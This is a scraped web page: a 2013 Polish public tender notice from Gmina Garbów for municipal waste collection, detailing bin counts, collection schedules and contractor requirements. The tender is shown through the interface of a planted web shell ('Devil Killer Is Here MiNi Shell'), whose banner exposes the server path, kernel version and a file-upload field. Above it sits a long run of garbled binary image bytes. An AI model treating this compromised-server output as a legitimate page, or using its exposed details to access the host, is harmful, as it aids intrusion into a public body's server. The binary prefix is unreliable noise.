JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130430/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130430/173064-N-2013.html

<p class="kh_header"><b>Garbów: Odbieranie i zagospodarowanie odpadów komunalnych z terenu Gminy Garbów.</b><br>
<b>Numer ogłoszenia: 173064 - 2013; data zamieszczenia: 30.04.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Garbów , Garbów 28, 21-080 Garbów, woj. lubelskie, tel. 081 5018063, faks 081 5018070.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.garbow.lubelskie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbieranie i zagospodarowanie odpadów komunalnych z terenu Gminy Garbów..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia  jest wykonanie usługi polegającej na :
-odbiorze odpadów,
-zagospodarowaniu odpadów.
Przedmiot zamówienia obejmuje:
-odbiór i zagospodarowanie wszystkich rodzajów odpadów komunalnych powstałyc  i zebranych na wszystkich  nieruchomościach, na których zamieszkują mieszkańcy, położonych w granicach administracyjnych  Gminy Garbów, zgodnie z ustawą z   dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach Dz. U. z 2012 r. poz. 319  z późn. zm., ustawą z dnia 29 stycznia 2004 r. Prawo zamówień publicznych t. j. Dz. U.  z 2010 r. Nr 113, poz. 759 z późn. zm., z Wojewódzkim Planem Gospodarki Odpadami, z Regulaminem utrzymania czystości i porządku na terenie Gminy Garbów określonym Uchwałą Rady Gminy Garbów Nr XVIII/121/13 z dnia 20 marca 2013 r.  - w tym selektywnie odbieranych odpadów, nie rzadziej niż określono w przytoczonym regulaminie oraz  utworzenie Punktu Selektywnego Zbierania Odpadów Komunalnych i odbiór odpadów w nim  zgromadzonych, odbiór  i zagospodarowanie odpadów powstałych w miejscach użyteczności publicznej zarządzanych przez Gminę, 
-przekazywanie raportów miesięcznych o ilości i rodzaju odebranych  odpadów,
-przekazywanie sprawozdań kwartalnych w terminie do zakończenia miesiąca następnego po zakończeniu kwartału,
-wyposażenie gospodarstw domowych w pojemniki oraz dostawę pojemników do wyznaczonych miejsc w zabudowie wielorodzinnej, miejsc użyteczności publicznej  i PSZOK - na czas realizacji umowy,
-dostawę worków na odpady zebrane selektywnie,
      
Powierzchnia Gminy Garbów wynosi 102,6 km2, liczba ludności zgodnie z danymi GUS - wynosi 8946,  z czego 937 osób zamieszkuje w zabudowie wielorodzinnej, a 8009  w zabudowie jednorodzinnej w układzie kolonijnym i rozproszonym.
Zestawienie ilości mieszkańców w poszczególnych miejscowościach zameldowanych na pobyt stały i czasowy na podstawie danych z ewidencji ludności:
Bogucin  -  1086 
Borków  -   288
Garbów -  2170
Gutanów -  485
Janów -      241
Karolin -    339
Leśce -       511
Meszno -     65
Piotrowice Wielkie - 514
Piotrowice Kolonia - 117
Przybysławice - 845
Wola Przybysławska - 1401
Zagrody - 953
W celu poprawnej wyceny zadania Wykonawca zapozna się ze specyfiką i ukształtowaniem terenu  w/w miejscowościach.

Wykonawca zobowiązany jest do odbierania i zagospodarowania odpadów komunalnych wymienionych w tabeli nr1:

Tabela nr1

L.P.	RODZAJE ODPADÓW         
1Niesegregowane odpady komunalne
2Szkło, opakowania ze szkła
3Papier i tektura, opakowania z papieru i tektury
4Tworzywa sztuczne, opakowania z papieru i tektury
5Metale
6Opakowania wielomateriałowe
7Zużyty sprzęt elektryczny i elektroniczny, baterie
8Meble i inne odpady wielkogabarytowe
9Odpady budowlane i rozbiórkowe inne niż niebezpieczne
10Opakowania zawierające pozostałości substancji niebezpiecznych lub nimi zanieczyszczone 
11Inne nie wymienione odpady komunalne

W ramach podpisanej umowy Wykonawca za cenę ryczałtową wykona kompleksową obsługę w zakresie odbioru i zagospodarowania odpadów komunalnych z terenu Gminy Garbów, w tym pochodzących z miejsc użyteczności publicznej,  w sposób zapewniający osiągnięcie odpowiednich poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami oraz ograniczenie masy odpadów komunalnych ulegających biodegradacji przekazywanych do składowania, zgodnie z zapisami ustawy z dnia 13 września 1996 r.                      o utrzymaniu czystości i porządku w gminach Dz. U. z 2012 r. poz. 319 z późn. zm., zapisami  Wojewódzkiego  Planu Gospodarki Odpadami oraz przepisami Regulaminu utrzymania czystości  i porządku na terenie Gminy Garbów. 
Obsługa obejmuje także wyposażenie na czas umowy w pojemniki na odpady niesegregowane gospodarstwa  domowe zamieszkujące w domach jednorodzinnych, dostawę pojemników do wyznaczonych miejsc w zabudowie wielorodzinnej, miejsc użyteczności publicznej i PSZOK,  oraz dostawę nielimitowanej ilości worków na odpady zebrane selektywnie do wszystkich odbiorców zadeklarowanych  i wskazanych przez Zamawiającego.
Wykonawca będzie wykonywał przez cały okres obowiązywania umowy odbiór odpadów zmieszanych z pojemników: w zabudowie jednorodzinnej - raz na miesiąc, w zabudowie wielorodzinnej - raz na tydzień, z miejsc użyteczności publicznej - raz na tydzień, z PSZOK -według potrzeb. Odbiór odpadów zebranych selektywnie raz na miesiąc w zabudowie jednorodzinnej, raz na tydzień w zabudowie wielorodzinnej oprócz szkła, które w zabudowie wielorodzinnej będzie odbierane raz na  miesiąc.

Tabela nr 2 ilość odebranych odpadów w 2012 r. z terenu gminy Garbów pomocniczo

Rodzaj odpadów	Masa odebranych odpadów Mg
Niesegregowane odpady	301,36
Opakowania z  tworzyw sztucznych	2,492
Opakowania ze szkła	4,984
Szkło	33,74
Tworzywa sztuczne	26,124
metale	1,778
Inne selektywnie zebrane	67,62
Odpady rozbiórkowe	7,98
opony	9,1
Opakowania z papieru i tektury	8,218
Papier i tektura	35,14
Odpady ulegające biodegradacji	1,05
Elektroodpady	2,47

Liczba gospodarstw domowych:

Tabela nr 3 szacunkowa ilość gospodarstw domowych wg ilości osób na podstawie danych GUS

Ilość osób w gospodarstwie	 Liczba gospodarstw
1 osobowe	490
2 osobowe	544
3 i powyżej trzech osób	1647
Zamawiający zastrzega możliwość zmiany ilości gospodarstw w przedziale od -5% do +5%.
Na terenie Gminy Garbów będzie obowiązywał system mieszany: pojemnikowo-workowy zbiórki odpadów komunalnych.
Niesegregowane zmieszane odpady komunalne - zmieszane odpady komunalne oraz odpady powstałe po segregacji będą gromadzone w pojemnikach, które Wykonawca ustawi w miejscach wskazanych przez Właścicieli nieruchomości i Zarządców. Wykonawca zapewni i dostarczy  odpowiednie pojemniki na czas trwania umowy. W  wyjątkowych uzasadnionych przypadkach do zbierania odpadów zmieszanych służyć mogą worki foliowe 120 l dostarczone przez Wykonawcę.
W zabudowie wielorodzinnej  i w miejscach użyteczności publicznej do gromadzenia zmieszanych odpadów będą służyły pojemniki 1100 l  w  kolorze pomarańczowym - odbiór 1 na tydzień; w zabudowie  jednorodzinnej pojemniki 120 l bądź 240 l  w jednolitym kolorze odbiór - 1 na miesiąc.

Selektywnie zbierane odpady komunalne - selektywna zbiórka odpadów komunalnych będzie odbywała się: 
w zabudowie jednorodzinnej - w systemie workowym z częstotliwością odbioru raz na miesiąc. Wprowadza się trzy rodzaje worków: 
a)żółty - plastik, szkło opakowaniowe  bezbarwne i kolorowe oraz metalowe puszki;
b)niebieski - suchy i nie zanieczyszczony papier, tektura i tekstylia,
c)przezroczysty - na odpady zmieszane,
w zabudowie wielorodzinnej - w systemie pojemnikowym, odbiór raz na  
       tydzień,
a)pojemnik  1500 l typu dzwon lub kanarek 1500 l lub 700 l w kolorze niebieskim, 
b)pojemnik  1500 l typu dzwon lub kanarek  1500 l lub 700 l w kolorze żółtym,
c)pojemnik 1500 l typu dzwon w kolorze zielonym - na szkło,

w miejscach użyteczności publicznej oraz PSZOK: 
a)pojemnik 1100 l w kolorze pomarańczowym - na -odpady zmieszane;
b)inne w zależności od potrzeb  120 l, 240 l,  700 l, 1100 l, 1500 l, KP-7,
c)pojemniki specjalne do wyposażenia PSZOK według potrzeb.
Gabaryty i zużyty sprzęt elektryczny i elektroniczny - odbiór odpadów wielkogabarytowych i elektroszrotu będzie odbywał się poprzez jego dostarczenie do PSZOK-u oraz poprzez odbieranie wystawionych w/w odpadów  z miejsc wyznaczonych przez Zamawiającego raz do roku.

Wykaz urządzeń do gromadzenia odpadów:   
Pojemniki jednokolorowe wykonane zgodnie z obowiązującymi normami oraz wymaganiami zawartymi w Regulaminie utrzymania czystości i porządku w Gminie Garbów o pojemności:
a)1100 l;
b)240 l;
c)120 l;
d)1500 l typu dzwon;
e)KP-7 6500 l - 7000 l, otwarty - nie zabudowany,
f) 700 l;
Worki z folii polietylenowej LDPE o grubości 0,06 mm, wykonane zgodnie              z obowiązującymi normami o grubości zapobiegającej pęknięciu lub rozerwaniu       w kolorze:
a)żółtym 120 l;
b)niebieskim 120 l;
c)przezroczystym 120 l;

Tabela nr 4 Prognozowana  ilość i pojemność pojemników do dostarczenia przez Wykonawcę (bez uwzględnienia pojemników do wyposażenia PSZOK)

Pojemność pojemnika 	Ilość	Kolor
120 l	1501	jednokolorowe
240 l	1656	jednokolorowe w tym dwa jasnozielone na szkło
1100 l 	39	pomarańczowe
KP-7, - 6,5 - 7 m3  	1	pomarańczowe
KP-7, - 6,5 - 7 m 3	3 dysponowanie w	przypadku zgłoszenia odpadów budowlanych powstałych w gospodarstwie domowym do podstawienia
1100 l 	2	niebieskie - papier
700 l	2	żółty, 
700 l	4	niebieski
Dzwon 1,5 m3	4żółty, 
Dzwon 1,5 m3	4zielony
Dzwon 1,5 m3	2niebieski
Worki 120 l	nielimitowana żółty, niebieski, przezroczysty
 kolor wg uznania Wykonawcy 
Zamawiający zastrzega sobie zmianę ilości i rodzaju pojemników w celu regulacji poprawności odbioru odpadów. 
Pojemniki winny być w dobrym stanie technicznym i wizualnym, zaopatrzone w otwory wrzutowe wielkością i kształtem dostosowane do rodzaju zbieranego odpadu, oraz zaopatrzone w odpowiednie napisy: szkło, plastik, papier;

Tabela nr 5
Wykaz miejsc ustawienia pojemników w miejscach użyteczności publicznej 

Miejscowość	Usytuowanie	ilość	pojemność
Garbów	plac za budynkiem Urzędu Gminy	2	1100 l
	plac za budynkiem Urzędu Gminy	3pojemnik 1,5 m3 typu dzwon
parking w parku koło pałacu	3	1100 l
cmentarz	1	KP-7, 6,5 - 7 m3
cmentarz	3	1,5 m3 typu dzwon
boisko obok firmy File	1	240 l
Karolin	świetlica  szkoła	1	700 l
Gutanów	remiza OSP	1	120 l
świetlica wiejska	1	240 l
Wola Przybysławska	boisko sportowe
przy remizie OSP	1	240 l
Przybysławice	cmentarz	1	1100 l
cmentarz	1	1,5 m3 typu dzwon
szkoła	1	1100 l
Piotrowice Duże	biblioteka k/ pałacu	1	120 l
remiza OSP	1	120 l
Janów	remiza OSP	1	120 l
                                                         
Obowiązki Wykonawcy
     
Wykonawca jest obowiązany spełniać  wszystkie warunki określone w Rozporządzeniu Ministra Środowiska z dnia  11 stycznia 2013 r. w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości Dz. U. z 2013 r. poz. 122.                                    Przytoczone Rozporządzenie określa miedzy innymi, że podmiot odbierający odpady komunalne od właścicieli nieruchomości jest obowiązany:
-posiadać bazę magazynowo- transportową usytuowaną w odległości nie większej niż 60 km od granic gminy;
-posiadać co najmniej dwa pojazdy przystosowane do odbierania zmieszanych odpadów komunalnych, a także co najmniej dwa pojazdy do odbierania odpadów bez funkcji kompaktującej oraz dwa lub jeden pojazd o ładowności do 3,5 t
-pojazdy odbierające odpady komunalne trwale i czytelnie oznakować w widocznym miejscu nazwą firmy oraz danymi adresowymi i numerem telefonu;
-wyposażyć pojazdy odbierające odpady komunalne w system monitoringu bazującego na systemie pozycjonowania stacjonarnego, umożliwiający trwałe zapisywanie, przechowywanie i odczytywanie danych o położeniu pojazdu i miejscach postojów oraz czujników zapisujących dane o miejscach wyładunków odpadów - umożliwiający weryfikacją danych.
Wykonawca zapewni Zamawiającemu dostęp do zapisanych danych z monitoringu, o którym mowa wyżej dotyczących obsługiwanego terenu gm. Garbów, każdorazowo na życzenie Zamawiającego bez zbędnej zwłoki w celu kontroli prawidłowości realizowania umowy  i przedkładanych sprawozdań z wykonywanych obowiązków przez Wykonawcę..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.51.10.00-2, 90.51.00.00-5, 90.51.40.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium w kwocie 10.000 zł slownie : dziesięć tysięcy złotych.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)posiadanie wpisu do rejestru działalności regulowanej o której mowa w art. 9b     ustawy z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach prowadzonego przez właściwy organ, w zakresie objętym przedmiotem zamówienia;  
b)posiadanie wpisu do rejestru zbierających zużyty sprzęt  elektryczny i elektroniczny prowadzonego przez Głównego Inspektora Ochrony Środowiska wymaganego zgodnie z art. 7 ustawy z dnia 29 lipca 2005 r. o zużytym sprzęcie elektrycznym i elektronicznym;
c)posiadanie zezwolenia na transport odpadów , o którym mowa w art. 28 ustawy  z dnia 27 kwietnia 2001 r. o odpadach w zakresie objętym przedmiotem zamówienia,z uwzględnieniem wymogów art. 32 i art. 33 ustawy o odpadach, 
przy czym wymóg nie jest obowiązkowy, gdy Wykonawca posiada zezwolenie na odzysk i unieszkodliwienie o którym mowa w art. 26 ustawy;
d)posiadanie zezwolenia na odzysk i unieszkodliwianie odpadów, o którym mowa     w art.26 ustawy z dnia 27 kwietnia 2001 r. o odpadach, w przypadku gdy wykonawca zamierza przekazywać odpady innemu prowadzącemu odzysk lub unieszkodliwianie poza  granicami Rzeczpospolitej Polskiej, powinien zawrzeć umowę na wskazany zakres z podmiotem posiadającym zezwolenie w tym zakresie wynikające  z prawa kraju przeznaczenia jeżeli jest wymagane, a Wykonawca musi dostarczyć kopię tej umowy;
e)posiadanie umowy z Regionalną Instalacją do Przetwarzania Odpadów Komunalnych dla regionu do którego należy Gmina Garbów, na przyjmowanie odebranych zmieszanych odpadów komunalnych, odpadów  zielonych oraz pozostałości z sortowania odpadów komunalnych;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek posiadania wiedzy i doświadczenia uznaje się za spełniony jeżeli Wykonawca udokumentuje wykonanie z należytą starannością , że w ostatnich trzech latach przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonywał lub wykonują co najmniej jedną usługę polegającą na odbiorze, transporcie i przekazywaniu  do odzysku lub unieszkodliwiania odpadów komunalnych na rzecz właścicieli nieruchomości w sposób ciągły, przez okres 12 miesięcy o łącznej masie 1000 Mg.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dysponowania odpowiednim potencjałem technicznym uznaje się za spełniony, jeżeli Wykonawca posiada sprzęt niezbędny  do wykonywania przedmiotu umowy  zgodnie  z obowiązującymi przepisami oraz wymaganiami Zamawiającego. W tym celu wykonawca sporządza wykaz posiadanego sprzętu obejmującego co najmniej:

Tabela nr 6
L.P	OPIS/TYP	ŁADOWNOŚĆ	WYMAGANE ILOŚCI SPRZĘTU	POSIADANE ILOŚCI SPRZĘTU
1Samochód specjalny przystosowany do opróżniania pojemników o pojemności od 110 l- 1100 l 		2	
2Samochód specjalny z zabudową typu dźwig bramowy bądź hakowiec przystosowany do transportu pojemników typu KP-7		

1	
3Samochód specjalny przeznaczony do odbioru  i transportu selektywnie zebranych odpadów komunalnych i odpadów biodegradowalnych 	 

powyżej 3,5 t 2	
4Samochód mały przystosowany do odbioru zmieszanych odpadów i selektywnie zebranych w sposób uniemożliwiający ich wymieszanie się bądź  2 małe samochody oddzielny do odbioru zmieszanych odpadów i oddzielny dla selektywnie zebranych 
do 3,5 t 1 bądź 2 
do wykorzystania do odbioru odpadów z gospodarstw domowych o złym dojeżdzie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku dotyczącego sytuacji ekonomicznej i finansowej Zamawiający uzna dysponowanie przez Wykonawcę środkami finansowymi lub posiadanie zdolności kredytowej   w wysokości  nie mniejszej niż 300.000, - zł (słownie: trzysta tysięcy złotych) oraz posiadanie opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia na kwotę nie mniejszą niż 300.000, - zł słownie: trzysta tysięcy złotych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">opis urządzeń technicznych oraz środków organizacyjno-technicznych zastosowanych przez wykonawcę dostaw lub usług w celu zapewnienia jakości oraz opisu zaplecza naukowo-badawczego posiadanego przez wykonawcę lub które będzie pozostawało w dyspozycji wykonawcy;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

